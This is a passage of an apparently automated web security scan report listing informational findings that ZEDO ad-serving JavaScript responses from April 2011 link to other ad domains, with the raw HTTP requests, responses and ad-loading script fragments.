Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:4:2:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=195
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:06 GMT
Connection: close
Content-Length: 2125

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=3%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=3%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.127. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.24143277831922472 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=6:5:2:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:1,1,1:0,1,1:0,1,1:2,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:1,1,1:1,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:28 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:6:5:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=233
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:28 GMT
Connection: close
Content-Length: 2684

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931213%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=3%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=3%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.128. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5543871392896527 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=35:36:35:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:26 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=36:35:36:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:26 GMT
Connection: close
Content-Length: 2114

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.10;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921885%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=36%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=36%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.129. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7174333122017302 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=24:24:22:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=25:24:22:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=102
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:39 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5108358.3;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=25%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=25%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=25%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=25%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.130. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6496371365591397 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=33:33:33:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=34:33:33:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:16 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=34%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=34%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.131. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.2524137063524505 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=4:2:2:None; FFCap=1574B809,210132,210841,210128|2,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,210133|2,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:06 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:4:2:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=195
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:06 GMT
Connection: close
Content-Length: 2668

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=3%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=3%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.132. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.360491794551258 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=37:36:38:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=38:36:38:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:33 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=38%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=38%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.133. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.20291066933388213 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=7:6:8:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175|2,1,1:1,1,1:1,1,1:0,1,1:2,1,1:2,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:22 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=9:7:6:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=179
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:23 GMT
Connection: close
Content-Length: 2136

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=9%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=9%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.134. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.02226461079381503 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=40:44:41:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=42:40:44:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:48 GMT
Connection: close
Content-Length: 2694

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=935452%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=42%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=42%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.135. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.2702164217628481 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=53:47:48:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=48:53:48:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=106
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:08 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=48%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=48%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.136. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

